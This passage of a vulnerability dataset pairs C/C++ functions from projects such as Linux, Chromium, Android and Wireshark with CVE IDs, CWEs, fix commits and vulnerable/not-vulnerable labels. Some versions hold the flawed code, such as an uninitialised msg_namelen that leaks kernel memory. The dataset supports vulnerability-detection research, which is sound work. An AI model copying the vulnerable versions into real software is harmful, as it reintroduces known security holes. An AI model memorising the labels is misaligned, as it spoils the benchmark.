configure_env(char **env, const char *prefix, const struct dhcp_message *dhcp, const struct if_options *ifo) { unsigned int i; const uint8_t *p; int pl; struct in_addr addr; struct in_addr net; struct in_addr brd; char *val, *v; const struct dhcp_opt *opt; ssize_t len, e = 0; char **ep; char cidr[4]; uint8_t overl = 0; get_option_uint8(&overl, dhcp, DHO_OPTIONSOVERLOADED); if (!env) { for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; if (get_option_raw(dhcp, opt->option)) e++; } if (dhcp->yiaddr || dhcp->ciaddr) e += 5; if (*dhcp->bootfile && !(overl & 1)) e++; if (*dhcp->servername && !(overl & 2)) e++; return e; } ep = env; if (dhcp->yiaddr || dhcp->ciaddr) { /* Set some useful variables that we derive from the DHCP * message but are not necessarily in the options */ addr.s_addr = dhcp->yiaddr ? dhcp->yiaddr : dhcp->ciaddr; setvar(&ep, prefix, "ip_address", inet_ntoa(addr)); if (get_option_addr(&net, dhcp, DHO_SUBNETMASK) == -1) { net.s_addr = get_netmask(addr.s_addr); setvar(&ep, prefix, "subnet_mask", inet_ntoa(net)); } i = inet_ntocidr(net); snprintf(cidr, sizeof(cidr), "%d", inet_ntocidr(net)); setvar(&ep, prefix, "subnet_cidr", cidr); if (get_option_addr(&brd, dhcp, DHO_BROADCAST) == -1) { brd.s_addr = addr.s_addr | ~net.s_addr; setvar(&ep, prefix, "broadcast_address", inet_ntoa(brd)); } addr.s_addr = dhcp->yiaddr & net.s_addr; setvar(&ep, prefix, "network_number", inet_ntoa(addr)); } if (*dhcp->bootfile && !(overl & 1)) setvar(&ep, prefix, "filename", (const char *)dhcp->bootfile); if (*dhcp->servername && !(overl & 2)) setvar(&ep, prefix, "server_name", (const char *)dhcp->servername); for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; val = NULL; p = get_option(dhcp, opt->option, &pl, NULL); if (!p) continue; /* We only want the FQDN name */ if (opt->option == DHO_FQDN) { p += 3; pl -= 3; } len = print_option(NULL, 0, opt->type, pl, p); if (len < 0) return -1; e = strlen(prefix) + strlen(opt->var) + len + 4; v = val = *ep++ = xmalloc(e); v += snprintf(val, e, "%s_%s=", prefix, opt->var); if (len != 0) print_option(v, len, opt->type, pl, p); } return ep - env; }
C
Android
0
CVE-2013-0892
https://www.cvedetails.com/cve/CVE-2013-0892/
null
https://github.com/chromium/chromium/commit/da5e5f78f02bc0af5ddc5694090defbef7853af1
da5e5f78f02bc0af5ddc5694090defbef7853af1
DevTools: remove references to modules/device_orientation from core BUG=340221 Review URL: https://codereview.chromium.org/150913003 git-svn-id: svn://svn.chromium.org/blink/trunk@166493 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void InspectorPageAgent::captureScreenshot(ErrorString*, const String*, const int*, const int*, const int*, String*, RefPtr<TypeBuilder::Page::ScreencastFrameMetadata>&) { }
void InspectorPageAgent::captureScreenshot(ErrorString*, const String*, const int*, const int*, const int*, String*, RefPtr<TypeBuilder::Page::ScreencastFrameMetadata>&) { }
C
Chrome
0
CVE-2013-3226
https://www.cvedetails.com/cve/CVE-2013-3226/
CWE-200
https://github.com/torvalds/linux/commit/c8c499175f7d295ef867335bceb9a76a2c3cdc38
c8c499175f7d295ef867335bceb9a76a2c3cdc38
Bluetooth: SCO - Fix missing msg_namelen update in sco_sock_recvmsg() If the socket is in state BT_CONNECT2 and BT_SK_DEFER_SETUP is set in the flags, sco_sock_recvmsg() returns early with 0 without updating the possibly set msg_namelen member. This, in turn, leads to a 128 byte kernel stack leak in net/socket.c. Fix this by updating msg_namelen in this case. For all other cases it will be handled in bt_sock_recvmsg(). Cc: Marcel Holtmann <[email protected]> Cc: Gustavo Padovan <[email protected]> Cc: Johan Hedberg <[email protected]> Signed-off-by: Mathias Krause <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static void sco_sock_init(struct sock *sk, struct sock *parent) { BT_DBG("sk %p", sk); if (parent) { sk->sk_type = parent->sk_type; bt_sk(sk)->flags = bt_sk(parent)->flags; security_sk_clone(parent, sk); } }
static void sco_sock_init(struct sock *sk, struct sock *parent) { BT_DBG("sk %p", sk); if (parent) { sk->sk_type = parent->sk_type; bt_sk(sk)->flags = bt_sk(parent)->flags; security_sk_clone(parent, sk); } }
C
linux
0
CVE-2012-2375
https://www.cvedetails.com/cve/CVE-2012-2375/
CWE-189
https://github.com/torvalds/linux/commit/20e0fa98b751facf9a1101edaefbc19c82616a68
20e0fa98b751facf9a1101edaefbc19c82616a68
Fix length of buffer copied in __nfs4_get_acl_uncached _copy_from_pages() used to copy data from the temporary buffer to the user passed buffer is passed the wrong size parameter when copying data. res.acl_len contains both the bitmap and acl lenghts while acl_len contains the acl length after adjusting for the bitmap size. Signed-off-by: Sachin Prabhu <[email protected]> Signed-off-by: Trond Myklebust <[email protected]>
static void nfs_set_open_stateid(struct nfs4_state *state, nfs4_stateid *stateid, fmode_t fmode) { write_seqlock(&state->seqlock); nfs_set_open_stateid_locked(state, stateid, fmode); write_sequnlock(&state->seqlock); }
static void nfs_set_open_stateid(struct nfs4_state *state, nfs4_stateid *stateid, fmode_t fmode) { write_seqlock(&state->seqlock); nfs_set_open_stateid_locked(state, stateid, fmode); write_sequnlock(&state->seqlock); }
C
linux
0
CVE-2016-5354
https://www.cvedetails.com/cve/CVE-2016-5354/
CWE-476
https://github.com/wireshark/wireshark/commit/2cb5985bf47bdc8bea78d28483ed224abdd33dc6
2cb5985bf47bdc8bea78d28483ed224abdd33dc6
Make class "type" for USB conversations. USB dissectors can't assume that only their class type has been passed around in the conversation. Make explicit check that class type expected matches the dissector and stop/prevent dissection if there isn't a match. Bug: 12356 Change-Id: Ib23973a4ebd0fbb51952ffc118daf95e3389a209 Reviewed-on: https://code.wireshark.org/review/15212 Petri-Dish: Michael Mann <[email protected]> Reviewed-by: Martin Kaiser <[email protected]> Petri-Dish: Martin Kaiser <[email protected]> Tested-by: Petri Dish Buildbot <[email protected]> Reviewed-by: Michael Mann <[email protected]>
dissect_usb_vid_interrupt(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void *data) { usb_conv_info_t *usb_conv_info; gint bytes_available; int offset = 0; usb_conv_info = (usb_conv_info_t *)data; bytes_available = tvb_reported_length_remaining(tvb, offset); col_set_str(pinfo->cinfo, COL_PROTOCOL, "USBVIDEO"); if (bytes_available > 0) { guint8 originating_interface; guint8 originating_entity; originating_interface = tvb_get_guint8(tvb, offset) & INT_ORIGINATOR_MASK; proto_tree_add_item(tree, hf_usb_vid_interrupt_bStatusType, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; originating_entity = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bOriginator, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; if (originating_interface == INT_VIDEOCONTROL) { guint8 control_sel; guint8 attribute; const gchar *control_name; proto_tree_add_item(tree, hf_usb_vid_control_interrupt_bEvent, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; control_sel = tvb_get_guint8(tvb, offset); control_name = get_control_selector_name(originating_entity, control_sel, usb_conv_info); if (!control_name) control_name = "Unknown"; proto_tree_add_uint_format_value(tree, hf_usb_vid_control_selector, tvb, offset, 1, control_sel, "%s (0x%02x)", control_name, control_sel); offset++; attribute = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bAttribute, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; switch (attribute) { case CONTROL_CHANGE_FAILURE: proto_tree_add_item(tree, hf_usb_vid_request_error, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; break; case CONTROL_CHANGE_INFO: offset = dissect_usb_vid_control_info(tree, tvb, offset); break; case CONTROL_CHANGE_VALUE: case CONTROL_CHANGE_MIN: case CONTROL_CHANGE_MAX: dissect_usb_vid_control_value(tree, tvb, offset, attribute); offset += tvb_reported_length_remaining(tvb, offset); break; default: proto_tree_add_item(tree, hf_usb_vid_value_data, tvb, offset, -1, ENC_NA); offset += tvb_reported_length_remaining(tvb, offset); break; } } else if (originating_interface == INT_VIDEOSTREAMING) { /* @todo */ } } else offset = -2; return offset; }
dissect_usb_vid_interrupt(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void *data) { usb_conv_info_t *usb_conv_info; gint bytes_available; int offset = 0; usb_conv_info = (usb_conv_info_t *)data; bytes_available = tvb_reported_length_remaining(tvb, offset); col_set_str(pinfo->cinfo, COL_PROTOCOL, "USBVIDEO"); if (bytes_available > 0) { guint8 originating_interface; guint8 originating_entity; originating_interface = tvb_get_guint8(tvb, offset) & INT_ORIGINATOR_MASK; proto_tree_add_item(tree, hf_usb_vid_interrupt_bStatusType, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; originating_entity = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bOriginator, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; if (originating_interface == INT_VIDEOCONTROL) { guint8 control_sel; guint8 attribute; const gchar *control_name; proto_tree_add_item(tree, hf_usb_vid_control_interrupt_bEvent, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; control_sel = tvb_get_guint8(tvb, offset); control_name = get_control_selector_name(originating_entity, control_sel, usb_conv_info); if (!control_name) control_name = "Unknown"; proto_tree_add_uint_format_value(tree, hf_usb_vid_control_selector, tvb, offset, 1, control_sel, "%s (0x%02x)", control_name, control_sel); offset++; attribute = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bAttribute, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; switch (attribute) { case CONTROL_CHANGE_FAILURE: proto_tree_add_item(tree, hf_usb_vid_request_error, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; break; case CONTROL_CHANGE_INFO: offset = dissect_usb_vid_control_info(tree, tvb, offset); break; case CONTROL_CHANGE_VALUE: case CONTROL_CHANGE_MIN: case CONTROL_CHANGE_MAX: dissect_usb_vid_control_value(tree, tvb, offset, attribute); offset += tvb_reported_length_remaining(tvb, offset); break; default: proto_tree_add_item(tree, hf_usb_vid_value_data, tvb, offset, -1, ENC_NA); offset += tvb_reported_length_remaining(tvb, offset); break; } } else if (originating_interface == INT_VIDEOSTREAMING) { /* @todo */ } } else offset = -2; return offset; }
C
wireshark
0
CVE-2016-2496
https://www.cvedetails.com/cve/CVE-2016-2496/
CWE-264
https://android.googlesource.com/platform/frameworks/native/+/03a53d1c7765eeb3af0bc34c3dff02ada1953fbf
03a53d1c7765eeb3af0bc34c3dff02ada1953fbf
Add new MotionEvent flag for partially obscured windows. Due to more complex window layouts resulting in lots of overlapping windows, the policy around FLAG_WINDOW_IS_OBSCURED has changed to only be set when the point at which the window was touched is obscured. Unfortunately, this doesn't prevent tapjacking attacks that overlay the dialog's text, making a potentially dangerous operation seem innocuous. To avoid this on particularly sensitive dialogs, introduce a new flag that really does tell you when your window is being even partially overlapped. We aren't exposing this as API since we plan on making the original flag more robust. This is really a workaround for system dialogs since we generally know their layout and screen position, and that they're unlikely to be overlapped by other applications. Bug: 26677796 Change-Id: I9e336afe90f262ba22015876769a9c510048fd47
InputDispatcher::DeviceResetEntry::~DeviceResetEntry() { }
InputDispatcher::DeviceResetEntry::~DeviceResetEntry() { }
C
Android
0
CVE-2013-7271
https://www.cvedetails.com/cve/CVE-2013-7271/
CWE-20
https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
net: rework recvmsg handler msg_name and msg_namelen logic This patch now always passes msg->msg_namelen as 0. recvmsg handlers must set msg_namelen to the proper size <= sizeof(struct sockaddr_storage) to return msg_name to the user. This prevents numerous uninitialized memory leaks we had in the recvmsg handlers and makes it harder for new code to accidentally leak uninitialized memory. Optimize for the case recvfrom is called with NULL as address. We don't need to copy the address at all, so set it to NULL before invoking the recvmsg handler. We can do so, because all the recvmsg handlers must cope with the case a plain read() is called on them. read() also sets msg_name to NULL. Also document these changes in include/linux/net.h as suggested by David Miller. Changes since RFC: Set msg->msg_name = NULL if user specified a NULL in msg_name but had a non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't affect sendto as it would bail out earlier while trying to copy-in the address. It also more naturally reflects the logic by the callers of verify_iovec. With this change in place I could remove " if (!uaddr || msg_sys->msg_namelen == 0) msg->msg_name = NULL ". This change does not alter the user visible error logic as we ignore msg_namelen as long as msg_name is NULL. Also remove two unnecessary curly brackets in ___sys_recvmsg and change comments to netdev style. Cc: David Miller <[email protected]> Suggested-by: Eric Dumazet <[email protected]> Signed-off-by: Hannes Frederic Sowa <[email protected]> Signed-off-by: David S. Miller <[email protected]>
int vcc_recvmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *msg, size_t size, int flags) { struct sock *sk = sock->sk; struct atm_vcc *vcc; struct sk_buff *skb; int copied, error = -EINVAL; if (sock->state != SS_CONNECTED) return -ENOTCONN; /* only handle MSG_DONTWAIT and MSG_PEEK */ if (flags & ~(MSG_DONTWAIT | MSG_PEEK)) return -EOPNOTSUPP; vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED, &vcc->flags) || test_bit(ATM_VF_CLOSE, &vcc->flags) || !test_bit(ATM_VF_READY, &vcc->flags)) return 0; skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &error); if (!skb) return error; copied = skb->len; if (copied > size) { copied = size; msg->msg_flags |= MSG_TRUNC; } error = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied); if (error) return error; sock_recv_ts_and_drops(msg, sk, skb); if (!(flags & MSG_PEEK)) { pr_debug("%d -= %d\n", atomic_read(&sk->sk_rmem_alloc), skb->truesize); atm_return(vcc, skb->truesize); } skb_free_datagram(sk, skb); return copied; }
int vcc_recvmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *msg, size_t size, int flags) { struct sock *sk = sock->sk; struct atm_vcc *vcc; struct sk_buff *skb; int copied, error = -EINVAL; msg->msg_namelen = 0; if (sock->state != SS_CONNECTED) return -ENOTCONN; /* only handle MSG_DONTWAIT and MSG_PEEK */ if (flags & ~(MSG_DONTWAIT | MSG_PEEK)) return -EOPNOTSUPP; vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED, &vcc->flags) || test_bit(ATM_VF_CLOSE, &vcc->flags) || !test_bit(ATM_VF_READY, &vcc->flags)) return 0; skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &error); if (!skb) return error; copied = skb->len; if (copied > size) { copied = size; msg->msg_flags |= MSG_TRUNC; } error = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied); if (error) return error; sock_recv_ts_and_drops(msg, sk, skb); if (!(flags & MSG_PEEK)) { pr_debug("%d -= %d\n", atomic_read(&sk->sk_rmem_alloc), skb->truesize); atm_return(vcc, skb->truesize); } skb_free_datagram(sk, skb); return copied; }
C
linux
1
CVE-2011-4112
https://www.cvedetails.com/cve/CVE-2011-4112/
CWE-264
https://github.com/torvalds/linux/commit/550fd08c2cebad61c548def135f67aba284c6162
550fd08c2cebad61c548def135f67aba284c6162
net: Audit drivers to identify those needing IFF_TX_SKB_SHARING cleared After the last patch, We are left in a state in which only drivers calling ether_setup have IFF_TX_SKB_SHARING set (we assume that drivers touching real hardware call ether_setup for their net_devices and don't hold any state in their skbs. There are a handful of drivers that violate this assumption of course, and need to be fixed up. This patch identifies those drivers, and marks them as not being able to support the safe transmission of skbs by clearning the IFF_TX_SKB_SHARING flag in priv_flags Signed-off-by: Neil Horman <[email protected]> CC: Karsten Keil <[email protected]> CC: "David S. Miller" <[email protected]> CC: Jay Vosburgh <[email protected]> CC: Andy Gospodarek <[email protected]> CC: Patrick McHardy <[email protected]> CC: Krzysztof Halasa <[email protected]> CC: "John W. Linville" <[email protected]> CC: Greg Kroah-Hartman <[email protected]> CC: Marcel Holtmann <[email protected]> CC: Johannes Berg <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static void bond_ethtool_get_drvinfo(struct net_device *bond_dev, struct ethtool_drvinfo *drvinfo) { strncpy(drvinfo->driver, DRV_NAME, 32); strncpy(drvinfo->version, DRV_VERSION, 32); snprintf(drvinfo->fw_version, 32, "%d", BOND_ABI_VERSION); }
static void bond_ethtool_get_drvinfo(struct net_device *bond_dev, struct ethtool_drvinfo *drvinfo) { strncpy(drvinfo->driver, DRV_NAME, 32); strncpy(drvinfo->version, DRV_VERSION, 32); snprintf(drvinfo->fw_version, 32, "%d", BOND_ABI_VERSION); }
C
linux
0
CVE-2007-5199
https://www.cvedetails.com/cve/CVE-2007-5199/
CWE-119
https://cgit.freedesktop.org/xorg/lib/libXfont/commit/?id=5bf703700ee4a5d6eae20da07cb7a29369667aef
5bf703700ee4a5d6eae20da07cb7a29369667aef
null
ComparePriority(const void *p1, const void *p2) { FontDirectoryPtr dir1 = (*(FontPathElementPtr*) p1)->private; FontDirectoryPtr dir2 = (*(FontPathElementPtr*) p2)->private; const char *pri1 = NULL; const char *pri2 = NULL; if (dir1->attributes != NULL) pri1 = strstr(dir1->attributes, PriorityAttribute); if (dir2->attributes != NULL) pri2 = strstr(dir2->attributes, PriorityAttribute); if (pri1 == NULL && pri2 == NULL) return 0; else if (pri1 == NULL) return 1; else if (pri2 == NULL) return -1; else return atoi(pri1 + strlen(PriorityAttribute)) - atoi(pri2 + strlen(PriorityAttribute)); }
ComparePriority(const void *p1, const void *p2) { FontDirectoryPtr dir1 = (*(FontPathElementPtr*) p1)->private; FontDirectoryPtr dir2 = (*(FontPathElementPtr*) p2)->private; const char *pri1 = NULL; const char *pri2 = NULL; if (dir1->attributes != NULL) pri1 = strstr(dir1->attributes, PriorityAttribute); if (dir2->attributes != NULL) pri2 = strstr(dir2->attributes, PriorityAttribute); if (pri1 == NULL && pri2 == NULL) return 0; else if (pri1 == NULL) return 1; else if (pri2 == NULL) return -1; else return atoi(pri1 + strlen(PriorityAttribute)) - atoi(pri2 + strlen(PriorityAttribute)); }
C
libxfont
0
CVE-2011-2918
https://www.cvedetails.com/cve/CVE-2011-2918/
CWE-399
https://github.com/torvalds/linux/commit/a8b0ca17b80e92faab46ee7179ba9e99ccb61233
a8b0ca17b80e92faab46ee7179ba9e99ccb61233
perf: Remove the nmi parameter from the swevent and overflow interface The nmi parameter indicated if we could do wakeups from the current context, if not, we would set some state and self-IPI and let the resulting interrupt do the wakeup. For the various event classes: - hardware: nmi=0; PMI is in fact an NMI or we run irq_work_run from the PMI-tail (ARM etc.) - tracepoint: nmi=0; since tracepoint could be from NMI context. - software: nmi=[0,1]; some, like the schedule thing cannot perform wakeups, and hence need 0. As one can see, there is very little nmi=1 usage, and the down-side of not using it is that on some platforms some software events can have a jiffy delay in wakeup (when arch_irq_work_raise isn't implemented). The up-side however is that we can remove the nmi parameter and save a bunch of conditionals in fast paths. Signed-off-by: Peter Zijlstra <[email protected]> Cc: Michael Cree <[email protected]> Cc: Will Deacon <[email protected]> Cc: Deng-Cheng Zhu <[email protected]> Cc: Anton Blanchard <[email protected]> Cc: Eric B Munson <[email protected]> Cc: Heiko Carstens <[email protected]> Cc: Paul Mundt <[email protected]> Cc: David S. Miller <[email protected]> Cc: Frederic Weisbecker <[email protected]> Cc: Jason Wessel <[email protected]> Cc: Don Zickus <[email protected]> Link: http://lkml.kernel.org/n/[email protected] Signed-off-by: Ingo Molnar <[email protected]>
static void init_sched_groups_power(int cpu, struct sched_domain *sd) { WARN_ON(!sd || !sd->groups); if (cpu != group_first_cpu(sd->groups)) return; sd->groups->group_weight = cpumask_weight(sched_group_cpus(sd->groups)); update_group_power(sd, cpu); }
static void init_sched_groups_power(int cpu, struct sched_domain *sd) { WARN_ON(!sd || !sd->groups); if (cpu != group_first_cpu(sd->groups)) return; sd->groups->group_weight = cpumask_weight(sched_group_cpus(sd->groups)); update_group_power(sd, cpu); }
C
linux
0
CVE-2018-19044
https://www.cvedetails.com/cve/CVE-2018-19044/
CWE-59
https://github.com/acassen/keepalived/commit/04f2d32871bb3b11d7dc024039952f2fe2750306
04f2d32871bb3b11d7dc024039952f2fe2750306
When opening files for write, ensure they aren't symbolic links Issue #1048 identified that if, for example, a non privileged user created a symbolic link from /etc/keepalvied.data to /etc/passwd, writing to /etc/keepalived.data (which could be invoked via DBus) would cause /etc/passwd to be overwritten. This commit stops keepalived writing to pathnames where the ultimate component is a symbolic link, by setting O_NOFOLLOW whenever opening a file for writing. This might break some setups, where, for example, /etc/keepalived.data was a symbolic link to /home/fred/keepalived.data. If this was the case, instead create a symbolic link from /home/fred/keepalived.data to /tmp/keepalived.data, so that the file is still accessible via /home/fred/keepalived.data. There doesn't appear to be a way around this backward incompatibility, since even checking if the pathname is a symbolic link prior to opening for writing would create a race condition. Signed-off-by: Quentin Armitage <[email protected]>
garp_group_interface_handler(vector_t *strvec) { interface_t *ifp = if_get_by_ifname(strvec_slot(strvec, 1), IF_CREATE_IF_DYNAMIC); if (!ifp) { report_config_error(CONFIG_GENERAL_ERROR, "WARNING - interface %s specified for garp_group doesn't exist", FMT_STR_VSLOT(strvec, 1)); return; } if (ifp->garp_delay) { report_config_error(CONFIG_GENERAL_ERROR, "garp_group already specified for %s - ignoring", FMT_STR_VSLOT(strvec, 1)); return; } #ifdef _HAVE_VRRP_VMAC_ /* We cannot have a group on a vmac interface */ if (ifp->vmac_type) { report_config_error(CONFIG_GENERAL_ERROR, "Cannot specify garp_delay on a vmac (%s) - ignoring", ifp->ifname); return; } #endif ifp->garp_delay = LIST_TAIL_DATA(garp_delay); }
garp_group_interface_handler(vector_t *strvec) { interface_t *ifp = if_get_by_ifname(strvec_slot(strvec, 1), IF_CREATE_IF_DYNAMIC); if (!ifp) { report_config_error(CONFIG_GENERAL_ERROR, "WARNING - interface %s specified for garp_group doesn't exist", FMT_STR_VSLOT(strvec, 1)); return; } if (ifp->garp_delay) { report_config_error(CONFIG_GENERAL_ERROR, "garp_group already specified for %s - ignoring", FMT_STR_VSLOT(strvec, 1)); return; } #ifdef _HAVE_VRRP_VMAC_ /* We cannot have a group on a vmac interface */ if (ifp->vmac_type) { report_config_error(CONFIG_GENERAL_ERROR, "Cannot specify garp_delay on a vmac (%s) - ignoring", ifp->ifname); return; } #endif ifp->garp_delay = LIST_TAIL_DATA(garp_delay); }
C
keepalived
0
null
null
null
https://github.com/chromium/chromium/commit/364fb6e517fc4fbc8196a4afba4f77b3d5300c3e
364fb6e517fc4fbc8196a4afba4f77b3d5300c3e
Add InputMethodObserver support into InputMethodBase This is a preparation CL to fix issue 164964. Following observer callbacks are defined but not yet supported by ui::InputMethodBase and its sub classes. - InputMethodObserver::OnCaretBoundsChanged - InputMethodObserver::OnInputLocaleChanged This CL makes these callbacks functional for each sub class of ui::InputMethodBase. BUG=164964 TEST=ui_unittests --gtest_filter=InputMethodBaseTest.* Review URL: https://codereview.chromium.org/48393003 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@231563 0039d316-1c4b-4281-b951-d872f2087c98
void InputMethodLinuxX11::OnInputLocaleChanged() { InputMethodBase::OnInputLocaleChanged(); }
void InputMethodLinuxX11::OnInputLocaleChanged() { }
C
Chrome
1
CVE-2017-5019
https://www.cvedetails.com/cve/CVE-2017-5019/
CWE-416
https://github.com/chromium/chromium/commit/f03ea5a5c2ff26e239dfd23e263b15da2d9cee93
f03ea5a5c2ff26e239dfd23e263b15da2d9cee93
Convert FrameHostMsg_DidAddMessageToConsole to Mojo. Note: Since this required changing the test RenderViewImplTest.DispatchBeforeUnloadCanDetachFrame, I manually re-introduced https://crbug.com/666714 locally (the bug the test was added for), and reran the test to confirm that it still covers the bug. Bug: 786836 Change-Id: I110668fa6f0f261fd2ac36bb91a8d8b31c99f4f1 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1526270 Commit-Queue: Lowell Manners <[email protected]> Reviewed-by: Daniel Cheng <[email protected]> Reviewed-by: Camille Lamy <[email protected]> Cr-Commit-Position: refs/heads/master@{#653137}
bool RenderFrameHostImpl::CreateNetworkServiceDefaultFactoryInternal( const base::Optional<url::Origin>& origin, network::mojom::URLLoaderFactoryRequest default_factory_request) { auto* context = GetSiteInstance()->GetBrowserContext(); bool bypass_redirect_checks = false; network::mojom::TrustedURLLoaderHeaderClientPtrInfo header_client; if (base::FeatureList::IsEnabled(network::features::kNetworkService)) { GetContentClient()->browser()->WillCreateURLLoaderFactory( context, this, GetProcess()->GetID(), false /* is_navigation */, false /* is_download */, origin.value_or(url::Origin()), &default_factory_request, &header_client, &bypass_redirect_checks); } devtools_instrumentation::WillCreateURLLoaderFactory( this, false /* is_navigation */, false /* is_download */, &default_factory_request); if (GetCreateNetworkFactoryCallbackForRenderFrame().is_null()) { GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), std::move(default_factory_request)); } else { network::mojom::URLLoaderFactoryPtr original_factory; GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), mojo::MakeRequest(&original_factory)); GetCreateNetworkFactoryCallbackForRenderFrame().Run( std::move(default_factory_request), GetProcess()->GetID(), original_factory.PassInterface()); } return bypass_redirect_checks; }
bool RenderFrameHostImpl::CreateNetworkServiceDefaultFactoryInternal( const base::Optional<url::Origin>& origin, network::mojom::URLLoaderFactoryRequest default_factory_request) { auto* context = GetSiteInstance()->GetBrowserContext(); bool bypass_redirect_checks = false; network::mojom::TrustedURLLoaderHeaderClientPtrInfo header_client; if (base::FeatureList::IsEnabled(network::features::kNetworkService)) { GetContentClient()->browser()->WillCreateURLLoaderFactory( context, this, GetProcess()->GetID(), false /* is_navigation */, false /* is_download */, origin.value_or(url::Origin()), &default_factory_request, &header_client, &bypass_redirect_checks); } devtools_instrumentation::WillCreateURLLoaderFactory( this, false /* is_navigation */, false /* is_download */, &default_factory_request); if (GetCreateNetworkFactoryCallbackForRenderFrame().is_null()) { GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), std::move(default_factory_request)); } else { network::mojom::URLLoaderFactoryPtr original_factory; GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), mojo::MakeRequest(&original_factory)); GetCreateNetworkFactoryCallbackForRenderFrame().Run( std::move(default_factory_request), GetProcess()->GetID(), original_factory.PassInterface()); } return bypass_redirect_checks; }
C
Chrome
0
CVE-2011-4324
https://www.cvedetails.com/cve/CVE-2011-4324/
null
https://github.com/torvalds/linux/commit/dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
NFSv4: Convert the open and close ops to use fmode Signed-off-by: Trond Myklebust <[email protected]>
nfs_init_locked(struct inode *inode, void *opaque) { struct nfs_find_desc *desc = (struct nfs_find_desc *)opaque; struct nfs_fattr *fattr = desc->fattr; set_nfs_fileid(inode, fattr->fileid); nfs_copy_fh(NFS_FH(inode), desc->fh); return 0; }
nfs_init_locked(struct inode *inode, void *opaque) { struct nfs_find_desc *desc = (struct nfs_find_desc *)opaque; struct nfs_fattr *fattr = desc->fattr; set_nfs_fileid(inode, fattr->fileid); nfs_copy_fh(NFS_FH(inode), desc->fh); return 0; }
C
linux
0
CVE-2016-3839
https://www.cvedetails.com/cve/CVE-2016-3839/
CWE-284
https://android.googlesource.com/platform/system/bt/+/472271b153c5dc53c28beac55480a8d8434b2d5c
472271b153c5dc53c28beac55480a8d8434b2d5c
DO NOT MERGE Fix potential DoS caused by delivering signal to BT process Bug: 28885210 Change-Id: I63866d894bfca47464d6e42e3fb0357c4f94d360 Conflicts: btif/co/bta_hh_co.c btif/src/btif_core.c Merge conflict resolution of ag/1161415 (referencing ag/1164670) - Directly into mnc-mr2-release
static void *reactor_thread(void *ptr) { reactor_t *reactor = (reactor_t *)ptr; thread_running = true; reactor_start(reactor); thread_running = false; return NULL; }
static void *reactor_thread(void *ptr) { reactor_t *reactor = (reactor_t *)ptr; thread_running = true; reactor_start(reactor); thread_running = false; return NULL; }
C
Android
0
CVE-2019-5837
https://www.cvedetails.com/cve/CVE-2019-5837/
CWE-200
https://github.com/chromium/chromium/commit/04aaacb936a08d70862d6d9d7e8354721ae46be8
04aaacb936a08d70862d6d9d7e8354721ae46be8
Reland "AppCache: Add padding to cross-origin responses." This is a reland of 85b389caa7d725cdd31f59e9a2b79ff54804b7b7 Initialized CacheRecord::padding_size to 0. Original change's description: > AppCache: Add padding to cross-origin responses. > > Bug: 918293 > Change-Id: I4f16640f06feac009d6bbbb624951da6d2669f6c > Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1488059 > Commit-Queue: Staphany Park <[email protected]> > Reviewed-by: Victor Costan <[email protected]> > Reviewed-by: Marijn Kruisselbrink <[email protected]> > Cr-Commit-Position: refs/heads/master@{#644624} Bug: 918293 Change-Id: Ie1d3f99c7e8a854d33255a4d66243da2ce16441c Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1539906 Reviewed-by: Victor Costan <[email protected]> Commit-Queue: Staphany Park <[email protected]> Cr-Commit-Position: refs/heads/master@{#644719}
bool AppCacheDatabase::InsertOnlineWhiteList( const OnlineWhiteListRecord* record) { if (!LazyOpen(kCreateIfNeeded)) return false; static const char kSql[] = "INSERT INTO OnlineWhiteLists (cache_id, namespace_url, is_pattern)" " VALUES (?, ?, ?)"; sql::Statement statement(db_->GetCachedStatement(SQL_FROM_HERE, kSql)); statement.BindInt64(0, record->cache_id); statement.BindString(1, record->namespace_url.spec()); statement.BindBool(2, record->is_pattern); return statement.Run(); }
